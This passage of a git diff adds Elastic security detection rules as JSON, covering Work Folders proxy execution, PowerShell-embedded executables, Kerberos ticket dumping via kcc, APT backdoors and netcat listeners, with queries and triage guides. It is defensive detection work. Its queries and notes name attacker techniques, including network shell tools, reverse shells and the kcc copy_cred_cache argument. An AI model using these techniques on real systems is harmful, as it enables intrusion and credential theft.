Process", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.name : (\"wscript.exe.log\",\n \"cscript.exe.log\",\n \"mshta.exe.log\",\n \"wmic.exe.log\",\n \"svchost.exe.log\",\n \"dllhost.exe.log\",\n \"cmstp.exe.log\",\n \"regsvr32.exe.log\")\n", + "references": [ + "http://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "acf738b5-b5b2-4acc-bad9-1e18ee234f40", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "acf738b5-b5b2-4acc-bad9-1e18ee234f40_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_108.json b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_108.json new file mode 100644 index 00000000000..742ab1012d2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_108.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the use of Windows Work Folders to execute a potentially masqueraded control.exe file in the current working directory. Misuse of Windows Work Folders could indicate malicious activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Signed Proxy Execution via MS Work Folders", + "note": "## Triage and analysis\n\n### Investigating Signed Proxy Execution via MS Work Folders\n\nWork Folders is a role service for file servers running Windows Server that provides a consistent way for users to access their work files from their PCs and devices. This allows users to store work files and access them from anywhere. When called, Work Folders will automatically execute any Portable Executable (PE) named control.exe as an argument before accessing the synced share.\n\nUsing Work Folders to execute a masqueraded control.exe could allow an adversary to bypass application controls and increase privileges.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the location of the WorkFolders.exe binary to determine if it was copied to the location of the control.exe binary. It resides in the System32 directory by default.\n- Trace the activity related to the control.exe binary to identify any continuing intrusion activity on the host.\n- Review the control.exe binary executed with Work Folders to determine maliciousness such as additional host activity or network traffic.\n- Determine if control.exe was synced to sync share, indicating potential lateral movement.\n- Review how control.exe was originally delivered on the host, such as emailed, downloaded from the web, or written to\ndisk from a separate binary.\n\n### False positive analysis\n\n- Windows Work Folders are used legitimately by end users and administrators for file sharing and syncing but not in the instance where a suspicious control.exe is passed as an argument.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Review the Work Folders synced share to determine if the control.exe was shared and if so remove it.\n- If no lateral movement was identified during investigation, take the affected host offline if possible and remove the control.exe binary as well as any additional artifacts identified during investigation.\n- Review integrating Windows Information Protection (WIP) to enforce data protection by encrypting the data on PCs using Work Folders.\n- Confirm with the user whether this was expected or not, and reset their password.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\"\n and process.name : \"control.exe\" and process.parent.name : \"WorkFolders.exe\"\n and not process.executable : (\"?:\\\\Windows\\\\System32\\\\control.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\control.exe\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/storage/work-folders/work-folders-overview", + "https://twitter.com/ElliotKillick/status/1449812843772227588", + "https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ad0d2742-9a49-11ec-8d6b-acde48001122_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_110.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_110.json new file mode 100644 index 00000000000..095ce3c30de --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_110.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Portable Executable Encoded in Powershell Script", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_106.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_106.json new file mode 100644 index 00000000000..894bb7a7435 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_106.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Kerberos credential cache (kcc) utility to dump locally cached Kerberos tickets. Adversaries may attempt to dump credential material in the form of tickets that can be leveraged for lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kerberos Cached Credentials Dumping", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:kcc and\n process.args:copy_cred_cache\n", + "references": [ + "https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/kerberosdump.py", + "https://opensource.apple.com/source/Heimdal/Heimdal-323.12/kuser/kcc-commands.in.auto.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ad88231f-e2ab-491c-8fc6-64746da26cfe", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "ad88231f-e2ab-491c-8fc6-64746da26cfe_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_1.json b/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_1.json new file mode 100644 index 00000000000..3f5e5da70cc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_1.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious process events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious APT Package Manager Execution", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.parent.name == \"apt\" and process.args == \"-c\" and process.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n )\n ] by process.entity_id\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\",\n \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\"\n )\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ad959eeb-2b7b-4722-ba08-a45f6622f005", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 1 + }, + "id": "ad959eeb-2b7b-4722-ba08-a45f6622f005_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_2.json b/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_2.json new file mode 100644 index 00000000000..634524ad8ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ad959eeb-2b7b-4722-ba08-a45f6622f005_2.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious process events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious APT Package Manager Execution", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.parent.name == \"apt\" and process.args == \"-c\" and process.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n )\n ] by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\",\n \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\"\n )\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ad959eeb-2b7b-4722-ba08-a45f6622f005", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 2 + }, + "id": "ad959eeb-2b7b-4722-ba08-a45f6622f005_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_110.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_110.json new file mode 100644 index 00000000000..ffca0702e23 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_110.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration.", + "false_positives": [ + "Netcat is a dual-use tool that can be used for benign or malicious activity. Netcat is included in some Linux distributions so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Transfer or Listener Established via Netcat", + "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the 